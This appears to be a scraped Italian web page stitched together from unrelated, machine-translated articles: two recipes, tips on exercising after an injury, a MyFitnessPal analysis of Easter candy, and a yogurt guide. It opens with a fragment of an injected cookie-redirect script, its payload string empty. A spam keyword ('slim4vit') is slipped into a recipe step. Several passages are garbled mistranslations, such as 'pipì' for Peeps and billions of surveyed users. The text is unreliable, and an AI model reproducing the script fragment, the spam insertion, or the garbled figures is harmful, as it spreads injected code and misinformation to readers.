=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " /> Torna ad allenarti in sicurezza con questi consigli degli esperti:

Torna ad allenarti in sicurezza con questi consigli degli esperti:

Torna ad allenarti in sicurezza con questi consigli degli esperti:

È così facile e così buono, non ti stancherai di questa zuppa tanto presto! Migliora il tuo gioco della zuppa e rendilo degno di Instagram servendolo insieme a toast al formaggio ed erbe fresche.

    Stampa

Zuppa Di Pomodori Arrostiti Di Peperoni Rossi

ingredienti

2 cucchiai di olio d'oliva1 porro medio (solo bianco), affettato sottilmente1/2 cipolla, tritata3 spicchi d'aglio, tritati1 (28 once) può pomodori arrostiti al fuoco1 vasetto (13 once) di peperoni rossi arrostiti, scolati1 cucchiaino di origano secco1 cucchiaino di zuccheroSale e pepe a piacere

Indicazioni

In una pentola capiente, aggiungere l'olio d'oliva. Unire il porro e la cipolla. Cuocere finché non si ammorbidiscono e diventano traslucidi, circa 3-5 minuti.

Mescolare l'aglio e cuocere per un altro minuto. Spegnere il fuoco e trasferire in un robot da cucina. Aggiungere slim4vit i pomodori e i peperoni rossi e frullare fino a che liscio.

Trasferire di nuovo nella pentola e aggiungere l'origano e lo zucchero. Portare a fuoco lento. Aggiustare di sale e pepe a piacere e servire!

Informazioni nutrizionali

Porzioni: 5 | Porzione: 1 tazza

Per porzione: Calorie: 172; Grassi totali: 6 g; Grassi Saturi: 1g; Grassi monoinsaturi: 4g; Colesterolo: 0mg; Sodio: 439 mg; Carboidrati: 24 g; Fibra alimentare: 3g; Zucchero: 9g; Proteine: 4g

Bonus nutrizionale: Potassio: 52 mg; Ferro: 24%; Vitamina A: 24%; Vitamina C: 107%; Calcio: 10%

Tempo attivo: 25 minuti Tempo totale: 35 minuti

Questo piatto di gamberetti veloce e leggermente piccante ispirato al Cajun sostituisce la tradizionale semola di mais con il cavolfiore grattugiato. Quando viene cotto con un po' di latte e foglie di alloro, il cavolfiore diventa tenero e cremoso. Se mantieni la testa del cavolfiore intera, grattugiare il cavolfiore diventa un gioco da ragazzi, fermati quando arrivi alla parte più dura del torsolo.

Consiglio RD: sostituire la semola di mais con il cavolfiore aumenta il contenuto di fibre di 5 grammi. Questa ricetta è ottima se stai cercando di seguire una dieta ricca di proteine ​​perché vuoi comunque assicurarti di assumere abbastanza fibre.

    Stampa

Gamberetti e Cavolfiore “Semola”

ingredienti

1 cucchiaio di olio d'oliva1 peperone rosso grande, privato dei semi e tritato1 cipolla media, tritata2 piccoli spicchi d'aglio, tritati1 (15 oz/425 g) non può pomodori a dadini con aggiunta di sodio1 cucchiaio di condimento Cajun senza sale1 cavolfiore a testa media (2 libbre), foglie, gambo duro e torsolo rimossi3/4 di tazza (177 ml) di latte o latte vegetale non zuccherato1/2 cucchiaino di sale, diviso1/4 cucchiaino di pepe1/2 tazza (57 g) di formaggio cheddar grattugiato1 libbra (454 g) di gamberi, sgusciati e puliti1/4 tazza (12 g) di prezzemolo, tritatoSalsa piccante, facoltativa, per servire

Indicazioni

Scaldare l'olio in una padella larga a fuoco medio. Quando l'olio è caldo, aggiungere il peperone e le cipolle e soffriggere finché le verdure non sono tenere e iniziano a rosolare, 5 minuti. Aggiungere l'aglio e cuocere finché non diventa fragrante, circa 30 secondi. Aggiungere i pomodori, il condimento Cajun e 1/4 di cucchiaino di sale e portare a ebollizione. Coprire e ridurre la fiamma al minimo.

Tagliare le foglie dal cavolfiore. Grattugiare il cavolfiore con una grattugia a cassetta in pezzi simili al riso, fermandosi quando si arriva al torsolo e al gambo. Eliminare il torsolo e mettere il cavolfiore grattugiato in una casseruola media. Aggiungere il latte, il restante 1/4 di cucchiaino di sale e una foglia di alloro. Portare a ebollizione a fuoco medio-basso e cuocere, mescolando spesso, finché il cavolfiore non sarà molto tenero, circa 8 minuti. Aggiustate di pepe e mantecate con il formaggio. Coprire e tenere in caldo a fuoco basso.

Aggiungere i gamberi al composto di pomodoro, coprire e cuocere a fuoco basso, mescolando una volta, finché i gamberi non saranno cotti, circa 8 minuti. Dividere la “grana” in 4 ciotole poco profonde e guarnire con il composto di gamberi e una spolverata di prezzemolo.

Porzioni: 4 | Porzione: circa 1 tazza di miscela di gamberi, più 3/4 di tazza di grana di cavolfiore

Nutrizione (per porzione): calorie: 288; Grassi totali: 12 g; Grassi Saturi: 5g; Grassi monoinsaturi: 4g; Colesterolo: 240mg; Sodio: 678 mg; Carboidrati: 18 g; Fibra alimentare: 6g; Zucchero: 10 g; Proteine: 30g

Poche cose sono più frustranti per un avido attrezzo ginnico dell'essere messo da parte da un infortunio, quindi una volta che sei autorizzato a ricominciare la tua routine, può essere troppo facile tornare indietro senza pensare. Il problema è che così facendo aumenta solo le tue possibilità di re-infortunio.

Torna ad allenarti in sicurezza con questi consigli degli esperti:

IMPARA A SINTONIZZARSI CON I SEGNALI DEL DOLORE

Innanzitutto, è importante riconoscere la differenza tra il tipico dolore muscolare post-allenamento e il dolore reale. È normale sentirsi indolenziti il ​​giorno dopo aver corso o fatto stacchi da terra, soprattutto quando inizi di nuovo la tua routine dopo esserti preso una pausa. Cosa non è normale? Sentire lo stesso dolore o disagio che ha portato al tuo infortunio in primo luogo.

Se riscontri una ricorrenza dei sintomi di infortunio, il tuo corpo ti sta dicendo di ridurre l'intensità, o anche di mettere in pausa l'esercizio per un po' più a lungo. "Ad esempio, se stai facendo uno stacco e inizi a sentire un forte dolore lombare, o inizi a sentire dolore che scende lungo la gamba, questo è un segno che questo esercizio non è ancora sicuro", dice Jennifer Joslyn, una fisioterapista presso Motion Minnesota.

Se avverti un dolore acuto, acuto, lancinante e/o localizzato (dolore in un punto, come il polpaccio o la spalla) durante l'esercizio, dovresti calmarti o fermarti del tutto.

FOCUS SULLA QUALITÀ CHE SULLA QUANTITÀ

Invece di provare a fare un allenamento intenso non appena sei di nuovo in sella, dai la priorità all'affinamento della tua forma. Dopotutto, molte lesioni si verificano quando le persone eseguono ripetutamente un esercizio con una forma errata. "È meglio fare un esercizio e concentrarsi davvero sulla qualità del movimento piuttosto che sul volume, soprattutto dopo un infortunio", afferma Joslyn.

Se sei un sollevatore di pesi, questo potrebbe significare tornare a 3 serie da 5 ripetizioni ed eseguire ogni ripetizione nel modo più perfetto possibile, invece di eseguire 3 serie da 10. Probabilmente otterrai maggiori benefici in questo modo, anche se non stai eseguendo quella mossa ad alto volume. "Attiverai i muscoli appropriati quando presti attenzione alla qualità del movimento", osserva Joslyn.

Non aver paura di cercare un aiuto professionale se non sei sicuro di fare un esercizio correttamente. Puoi chiedere consiglio al tuo istruttore di classe, a un personal trainer o persino a un fisioterapista. Anche una o due sessioni con un fisioterapista possono fare molto: "Siamo sempre aperti a riprodurre diversi esercizi durante la sessione di PT solo per assicurarci che tu lo stia facendo correttamente", afferma Joslyn. "Non abbiamo problemi a far saltare i pazienti su un tapis roulant o in bicicletta solo per guardare il modulo".

Una volta che ti senti a tuo agio con il movimento - e sei in grado di farlo senza dolore - sentiti libero di progredire aggiungendo peso, aumentando il ritmo o la distanza o aggiungendo serie o ripetizioni. (Più su questo prossimo.)

RAMPA LENTAMENTE

Potresti essere tentato di riprendere da dove avevi interrotto prima dell'infortunio, ma la mossa intelligente è iniziare in modo facile e aggiungere gradualmente altro (intensità, volume, frequenza, densità) man mano che il tuo corpo si adatta.

Ad esempio, se riesci a distendere la panca 80 libbre prima dell'infortunio, non aspettarti di essere in grado di tornare indietro e di eseguire la panca 80 libbre subito. Se provi a forzarlo, potresti finire con un nuovo infortunio, dice Joslyn. Invece, inizia con un peso che è comodo per te e aumenta lentamente.

Indipendentemente dalla tua attività preferita, inizia con un peso, un chilometraggio o una durata dell'allenamento che puoi completare senza dolore. Da lì, aumenta gradualmente ogni settimana. Ad esempio, se hai corso 20 miglia senza dolore una settimana, puoi tranquillamente aumentare a 22 miglia la settimana successiva. Se sei stato in grado di eseguire uno squat di 100 libbre senza dolore una settimana, prova ad aggiungere altri 5-10 libbre la settimana successiva. Per altre attività, prova ad aggiungere 5 minuti alla durata totale dell'allenamento ogni settimana.

Detto questo, queste sono solo linee guida generali; procedere al proprio ritmo. "Ognuno è diverso da ciò che può tollerare e quanto tempo impiegherà per riprendersi da un infortunio", osserva Joslyn.

COMUNICARE CON GLI ISTRUTTORI

Se stai seguendo una lezione di yoga o fitness di gruppo, assicurati di informare in anticipo il tuo istruttore del tuo infortunio. "Dì solo: 'Ehi, ho questa storia di lombalgia. C'è un modo per modificare gli esercizi?'", dice Joslyn. In questo modo, il tuo istruttore sa di tenerti d'occhio durante la lezione e può guidarti verso opzioni più sicure e delicate, se necessario.

Se hai assunto un personal trainer, assicurati di condividere la tua cronologia completa.

Abbiamo intervistato miliardi di utenti di MyFitnessPal, raccolto dati da migliaia di sondaggi e trascorso settimane a condurre milioni di interviste porta a porta nei quartieri di tutto il mondo per scoprire:

Con la Pasqua proprio dietro l'angolo, stai lentamente introducendo calorie extra di caramelle - una gelatina qui, un coniglietto di cioccolato là - o stai aspettando che arrivi la domenica di Pasqua per regalarti? Se sei come milioni di americani, la risposta dipende dal tipo di caramelle. I dati dei membri di MyFitnessPal mostrano che le persone iniziano a fare spuntini con gelatine e uova di cioccolato con settimane di anticipo, ma non iniziano a fare pipì e coniglietti di cioccolato fino alla stessa domenica di Pasqua.

Le gelatine iniziano a diventare popolari a metà febbraio, con un consumo in costante aumento per tutta la primavera fino al loro picco il giorno di Pasqua, quando il consumo è aumentato del 1152% rispetto alla media. Dopo la domenica di Pasqua, c'è un forte calo, ma il consumo rimane ben al di sopra della media per tutto maggio. Nel complesso, le gelatine godono di circa tre mesi e mezzo di popolarità stagionale.

I Peep, d'altra parte, hanno un momento più breve al sole, con l'alta stagione dei Peep che dura solo un paio di settimane. Vedono un netto balzo verso la celebrità il giorno di Pasqua, con un impressionante aumento del 1706% rispetto alla media. Tuttavia, sono meno di un terzo più popolari delle gelatine.

Parliamo ora del cioccolato. Siamo rimasti sorpresi di vedere che non c'è stato alcun picco nel consumo complessivo di cioccolato a Pasqua. Infatti, scende leggermente, in calo del 6% rispetto alla media. A un esame più attento, tuttavia, questo ha perfettamente senso: le persone mangiano così tanto cioccolato su base giornaliera che è difficile battere la media, mentre le gelatine e i Peep costituiscono una percentuale molto più piccola della dieta quotidiana delle persone. Per darti una prospettiva, la scorsa Pasqua, un giorno al di sotto della media per il cioccolato, circa 20 volte più voci del diario di MyFitnessPal menzionavano il cioccolato come le gelatine menzionate.

Sebbene il consumo complessivo di cioccolato non si sia spostato molto a Pasqua, sospettavamo che i tipi di cibi a base di cioccolato consumati sarebbero stati diversi. E ragazzo erano loro. I primi 20 cibi contenenti cioccolato la domenica prima di Pasqua erano in gran parte costituiti da prelibatezze quotidiane come latte al cioccolato, frullati proteici al cioccolato e barrette di muesli al cioccolato. Nella stessa Pasqua, tuttavia, le uova di cioccolato hanno conquistato il secondo posto; i coniglietti di cioccolato sono entrati nella top 10 e diciamo solo che c'era molta più torta al cioccolato coinvolta. I frullati proteici al cioccolato, tuttavia, erano decisamente meno popolari.

Abbiamo ingrandito coniglietti di cioccolato e uova di cioccolato per un esame più attento. Come le gelatine, le uova di cioccolato vengono mangiate presto e spesso, mentre i coniglietti di cioccolato vengono mangiati solo dopo Pasqua. Ma in quel giorno glorioso, i coniglietti di cioccolato fanno dei veri e propri picchi, con un aumento del 2840% rispetto alla media.

Avendo visto due volte questo schema iniziale e spesso rispetto a quello successivo nei dati sulle caramelle, eravamo curiosi di sapere perché caramelle diverse mostrano modelli così diversi. Forse alcune caramelle sono più ampiamente disponibili prima di Pasqua, mentre altre sono disponibili solo più vicino al giorno stesso.

Abbiamo fatto un po' di giornalismo investigativo duro e abbiamo attraversato la strada per controllare gli scaffali dei Walgreens vicino al nostro ufficio di San Francisco. Al momento della stesura di questo articolo, mancano ancora circa quattro settimane alla Pasqua e tutte e quattro le prelibatezze di interesse sono già in offerta: pipì, gelatine, uova di cioccolato e coniglietti di cioccolato sono tutti presenti e rappresentati in una confezione pastello lucida.

Attingendo al nostro campione estremamente scientifico di un negozio, le differenze nelle curve di consumo delle caramelle non sembrano essere dovute alla disponibilità, ma indicano invece una reale differenza nelle preferenze delle persone.

Forse le persone si sentono ridicole (per non dire in colpa) mangiando caramelle a forma di coniglietto e pulcino in un giorno non festivo, ma i fagioli o le uova più piccoli e anonimi si sentono più permessi in qualsiasi giorno di primavera. Forse i coniglietti appartengono ai cestini, mentre i fagioli e le uova sono scelte legittime per i piatti di caramelle per la casa e l'ufficio. O forse le uova di cioccolato e le caramelle di gelatina sono semplicemente più gustose di Pip e coniglietti di cioccolato, quindi le persone le considerano degne di una pazzia per periodi di tempo più lunghi. Lo considereremo uno dei grandi misteri del nostro tempo, insieme a come il coniglietto pasquale consegna tutte quelle caramelle senza nemmeno il beneficio di una slitta.

Ora il tesoro del caseificio, lo yogurt può essere acquistato in una varietà di stili (tradizionale, montato, greco, skyr in stile islandese) e forme (cartoni, tubi, buste e pinte), per non parlare di gusti infiniti. Inutile dire che gli scaffali dello yogurt nella corsia dei latticini non sembrano più come una volta, grazie a un aumento del consumo di yogurt nell'ultimo decennio. Secondo i recenti dati al dettaglio della società di ricerche di mercato IRI, le vendite di yogurt sono aumentate del 7% dal 2011 e continuano a crescere.

Lo yogurt è ricco di nutrienti tra cui proteine, calcio e probiotici. Dai salutisti e culinari alle persone comuni che cercano solo uno spuntino gustoso, i consumatori scelgono lo yogurt per la sua nutrizione equilibrata, la varietà di sapore e consistenza, la portabilità, l'accessibilità e la versatilità.

Con il boom delle nuove marche di yogurt, molti consumatori che cercano uno spuntino gustoso o un'opzione per la colazione ricca di proteine ​​possono sentirsi sopraffatti o confusi. Rispondendo a queste rapide domande, sarai in grado di effettuare il tuo prossimo acquisto con fiducia.

Lo zucchero aggiunto è importante?Lo zucchero ti ha lasciato perplesso? Sappi questo: lo yogurt contiene lattosio, uno zucchero naturale che si trova nel latte e in altri prodotti lattiero-caseari. Tuttavia, le attuali etichette nutrizionali forniscono solo la quantità totale di zucchero in un prodotto, lasciando i consumatori confusi sullo zucchero aggiunto nello yogurt aromatizzato. Le nuove etichette lanciate a metà del 2018, tuttavia, elencheranno la quantità di zucchero aggiunto. Fino ad allora, questi numeri ti aiuteranno a determinare quanto zucchero aggiunto c'è in un prodotto:

Lo yogurt tradizionale a latte intero ha 10-15 grammi di lattosio per tazza.Lo yogurt greco puro e intero ha 5-10 grammi di lattosio per tazza.

Come regola generale, quando acquisti yogurt aromatizzati tradizionali, cerca quelli con meno di 22 grammi di zucchero totale per tazza. Quando acquisti yogurt greco, cerca quelli con meno di 15 grammi di zucchero totale per tazza. Inoltre, assicurati di leggere l'etichetta per assicurarti che lo zucchero non sia elencato come uno dei primi tre ingredienti (vedi la domanda successiva).

Da asporto: se stai cercando di ridurre il consumo di zucchero raffinato, scegli lo yogurt bianco e aromatizzalo con frutta fresca, come questa ciotola di yogurt al mango e ananas.

Cosa mi dice la lista degli ingredienti?

Alcuni yogurt, specialmente quelli commercializzati per bambini, non hanno solo zucchero aggiunto ma anche coloranti e aromi artificiali. Salta quelli quando puoi. Tieni d'occhio anche i conservanti aggiunti, gli addensanti e i dolcificanti artificiali e cerca di ridurli al minimo. Un elenco di ingredienti più breve ti assicurerà di ottenere tutti i benefici nutrizionali dello yogurt senza molte cose false.